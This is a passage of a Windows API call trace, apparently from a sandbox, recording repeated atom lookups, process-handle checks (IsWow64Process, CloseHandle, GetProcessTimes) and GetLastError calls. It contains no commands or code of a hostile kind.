	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.064] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.065] GetLastError () returned 0x5
	[0140.066] GetLastError () returned 0x5
	[0140.066] GetLastError () returned 0x5
	[0140.066] GetLastError () returned 0x5
	[0140.066] GetLastError () returned 0x5
	[0140.090] GetLastError () returned 0x5
	[0140.090] GetLastError () returned 0x5
	[0140.090] GetLastError () returned 0x5
	[0140.090] GetLastError () returned 0x5
	[0140.090] GetLastError () returned 0x5
	[0140.090] GetLastError () returned 0x5
	[0140.090] GetLastError () returned 0x5
	[0140.090] GetLastError () returned 0x5
	[0140.090] GetLastError () returned 0x5
	[0140.090] GetLastError () returned 0x5
	[0140.090] GetLastError () returned 0x5
	[0140.090] GetLastError () returned 0x5
	[0140.091] GetLastError () returned 0x5
	[0140.091] GetLastError () returned 0x5
	[0140.091] GetLastError () returned 0x5
	[0140.091] GetLastError () returned 0x5
	[0140.091] GetLastError () returned 0x5
	[0140.091] GetLastError () returned 0x5
	[0140.091] GetLastError () returned 0x5
	[0140.091] GetLastError () returned 0x5
	[0140.091] GetLastError () returned 0x5
	[0140.091] GetLastError () returned 0x5
	[0140.091] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.091] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.091] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.091] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.091] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.092] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.092] CloseHandle (hObject=0x2dc) returned 1
	[0140.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.092] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.092] CloseHandle (hObject=0x2dc) returned 1
	[0140.092] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.092] CloseHandle (hObject=0x2dc) returned 1
	[0140.093] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.093] CloseHandle (hObject=0x2dc) returned 1
	[0140.093] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.093] CloseHandle (hObject=0x2dc) returned 1
	[0140.093] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.093] CloseHandle (hObject=0x2dc) returned 1
	[0140.127] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.127] CloseHandle (hObject=0x2dc) returned 1
	[0140.127] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.127] CloseHandle (hObject=0x2dc) returned 1
	[0140.127] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.127] CloseHandle (hObject=0x2dc) returned 1
	[0140.128] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.128] CloseHandle (hObject=0x2dc) returned 1
	[0140.128] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.128] CloseHandle (hObject=0x2dc) returned 1
	[0140.128] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.128] CloseHandle (hObject=0x2dc) returned 1
	[0140.128] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.128] CloseHandle (hObject=0x2dc) returned 1
	[0140.129] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.129] CloseHandle (hObject=0x2dc) returned 1
	[0140.129] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.129] CloseHandle (hObject=0x2dc) returned 1
	[0140.129] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.129] CloseHandle (hObject=0x2dc) returned 1
	[0140.129] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.129] CloseHandle (hObject=0x2dc) returned 1
	[0140.130] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.130] CloseHandle (hObject=0x2dc) returned 1
	[0140.130] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.130] CloseHandle (hObject=0x2dc) returned 1
	[0140.130] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.130] CloseHandle (hObject=0x2dc) returned 1
	[0140.130] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.130] CloseHandle (hObject=0x2dc) returned 1
	[0140.131] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.131] CloseHandle (hObject=0x2dc) returned 1
	[0140.131] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.131] CloseHandle (hObject=0x2dc) returned 1
	[0140.131] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.131] CloseHandle (hObject=0x2dc) returned 1
	[0140.131] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.131] CloseHandle (hObject=0x2dc) returned 1
	[0140.132] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.132] CloseHandle (hObject=0x2dc) returned 1
	[0140.132] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.132] CloseHandle (hObject=0x2dc) returned 1
	[0140.132] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.132] CloseHandle (hObject=0x2dc) returned 1
	[0140.132] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.132] CloseHandle (hObject=0x2dc) returned 1
	[0140.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.133] CloseHandle (hObject=0x2dc) returned 1
	[0140.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.133] CloseHandle (hObject=0x2dc) returned 1
	[0140.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.133] CloseHandle (hObject=0x2dc) returned 1
	[0140.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.133] CloseHandle (hObject=0x2dc) returned 1
	[0140.134] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.134] CloseHandle (hObject=0x2dc) returned 1
	[0140.134] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.134] CloseHandle (hObject=0x2dc) returned 1
	[0140.134] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.134] CloseHandle (hObject=0x2dc) returned 1
	[0140.135] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.135] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.135] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.135] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.136] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.136] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.136] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.136] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.136] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.136] CloseHandle (hObject=0x2dc) returned 1
	[0140.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.137] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.137] CloseHandle (hObject=0x2dc) returned 1
	[0140.137] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.137] CloseHandle (hObject=0x2dc) returned 1
	[0140.137] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.137] CloseHandle (hObject=0x2dc) returned 1
	[0140.137] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.137] CloseHandle (hObject=0x2dc) returned 1
	[0140.138] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.138] CloseHandle (hObject=0x2dc) returned 1
	[0140.170] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.170] CloseHandle (hObject=0x2dc) returned 1
	[0140.170] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.170] CloseHandle (hObject=0x2dc) returned 1
	[0140.170] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.170] CloseHandle (hObject=0x2dc) returned 1
	[0140.171] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.171] CloseHandle (hObject=0x2dc) returned 1
	[0140.171] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.171] CloseHandle (hObject=0x2dc) returned 1
	[0140.171] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.171] CloseHandle (hObject=0x2dc) returned 1
	[0140.171] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.171] CloseHandle (hObject=0x2dc) returned 1
	[0140.172] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.172] CloseHandle (hObject=0x2dc) returned 1
	[0140.172] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.172] CloseHandle (hObject=0x2dc) returned 1
	[0140.172] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.172] CloseHandle (hObject=0x2dc) returned 1
	[0140.172] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.172] CloseHandle (hObject=0x2dc) returned 1
	[0140.173] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.173] CloseHandle (hObject=0x2dc) returned 1
	[0140.173] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.173] CloseHandle (hObject=0x2dc) returned 1
	[0140.173] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.173] CloseHandle (hObject=0x2dc) returned 1
	[0140.173] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.173] CloseHandle (hObject=0x2dc) returned 1
	[0140.174] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.174] CloseHandle (hObject=0x2dc) returned 1
	[0140.174] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.174] CloseHandle (hObject=0x2dc) returned 1
	[0140.174] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.174] CloseHandle (hObject=0x2dc) returned 1
	[0140.174] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.174] CloseHandle (hObject=0x2dc) returned 1
	[0140.175] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.175] CloseHandle (hObject=0x2dc) returned 1
	[0140.175] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.175] CloseHandle (hObject=0x2dc) returned 1
	[0140.175] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.175] CloseHandle (hObject=0x2dc) returned 1
	[0140.176] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.176] CloseHandle (hObject=0x2dc) returned 1
	[0140.176] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.176] CloseHandle (hObject=0x2dc) returned 1
	[0140.176] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.176] CloseHandle (hObject=0x2dc) returned 1
	[0140.176] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.176] CloseHandle (hObject=0x2dc) returned 1
	[0140.176] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.177] CloseHandle (hObject=0x2dc) returned 1
	[0140.177] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.177] CloseHandle (hObject=0x2dc) returned 1
	[0140.177] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.177] CloseHandle (hObject=0x2dc) returned 1
	[0140.177] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.177] CloseHandle (hObject=0x2dc) returned 1
	[0140.178] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.178] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.178] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.178] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.178] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.179] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.179] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.179] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.179] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.179] CloseHandle (hObject=0x2dc) returned 1
	[0140.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.179] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.179] CloseHandle (hObject=0x2dc) returned 1
	[0140.180] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.180] CloseHandle (hObject=0x2dc) returned 1
	[0140.180] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.180] CloseHandle (hObject=0x2dc) returned 1
	[0140.180] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.180] CloseHandle (hObject=0x2dc) returned 1
	[0140.180] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.180] CloseHandle (hObject=0x2dc) returned 1
	[0140.213] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.213] CloseHandle (hObject=0x2dc) returned 1
	[0140.213] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.213] CloseHandle (hObject=0x2dc) returned 1
	[0140.213] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.213] CloseHandle (hObject=0x2dc) returned 1
	[0140.213] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.213] CloseHandle (hObject=0x2dc) returned 1
	[0140.214] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.214] CloseHandle (hObject=0x2dc) returned 1
	[0140.214] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.214] CloseHandle (hObject=0x2dc) returned 1
	[0140.214] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.214] CloseHandle (hObject=0x2dc) returned 1
	[0140.214] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.214] CloseHandle (hObject=0x2dc) returned 1
	[0140.215] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.215] CloseHandle (hObject=0x2dc) returned 1
	[0140.215] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.215] CloseHandle (hObject=0x2dc) returned 1
	[0140.215] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.215] CloseHandle (hObject=0x2dc) returned 1
	[0140.216] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.216] CloseHandle (hObject=0x2dc) returned 1
	[0140.216] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.216] CloseHandle (hObject=0x2dc) returned 1
	[0140.216] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.216] CloseHandle (hObject=0x2dc) returned 1
	[0140.216] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.216] CloseHandle (hObject=0x2dc) returned 1
	[0140.217] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.217] CloseHandle (hObject=0x2dc) returned 1
	[0140.217] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.217] CloseHandle (hObject=0x2dc) returned 1
	[0140.217] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.217] CloseHandle (hObject=0x2dc) returned 1
	[0140.217] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.217] CloseHandle (hObject=0x2dc) returned 1
	[0140.217] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.218] CloseHandle (hObject=0x2dc) returned 1
	[0140.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.218] CloseHandle (hObject=0x2dc) returned 1
	[0140.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.218] CloseHandle (hObject=0x2dc) returned 1
	[0140.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.218] CloseHandle (hObject=0x2dc) returned 1
	[0140.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.219] CloseHandle (hObject=0x2dc) returned 1
	[0140.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.219] CloseHandle (hObject=0x2dc) returned 1
	[0140.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.219] CloseHandle (hObject=0x2dc) returned 1
	[0140.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.219] CloseHandle (hObject=0x2dc) returned 1
	[0140.220] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.220] CloseHandle (hObject=0x2dc) returned 1
	[0140.220] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.220] CloseHandle (hObject=0x2dc) returned 1
	[0140.220] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.220] CloseHandle (hObject=0x2dc) returned 1
	[0140.220] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.221] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.221] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.221] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.221] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.222] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.222] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.222] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.222] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.222] CloseHandle (hObject=0x2dc) returned 1
	[0140.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.222] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.222] CloseHandle (hObject=0x2dc) returned 1
	[0140.223] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.223] CloseHandle (hObject=0x2dc) returned 1
	[0140.223] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.223] CloseHandle (hObject=0x2dc) returned 1
	[0140.223] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.223] CloseHandle (hObject=0x2dc) returned 1
	[0140.223] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.223] CloseHandle (hObject=0x2dc) returned 1
	[0140.256] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.257] CloseHandle (hObject=0x2dc) returned 1
	[0140.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.257] CloseHandle (hObject=0x2dc) returned 1
	[0140.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.257] CloseHandle (hObject=0x2dc) returned 1
	[0140.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.257] CloseHandle (hObject=0x2dc) returned 1
	[0140.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.258] CloseHandle (hObject=0x2dc) returned 1
	[0140.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.258] CloseHandle (hObject=0x2dc) returned 1
	[0140.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.258] CloseHandle (hObject=0x2dc) returned 1
	[0140.258] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.258] CloseHandle (hObject=0x2dc) returned 1
	[0140.259] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.259] CloseHandle (hObject=0x2dc) returned 1
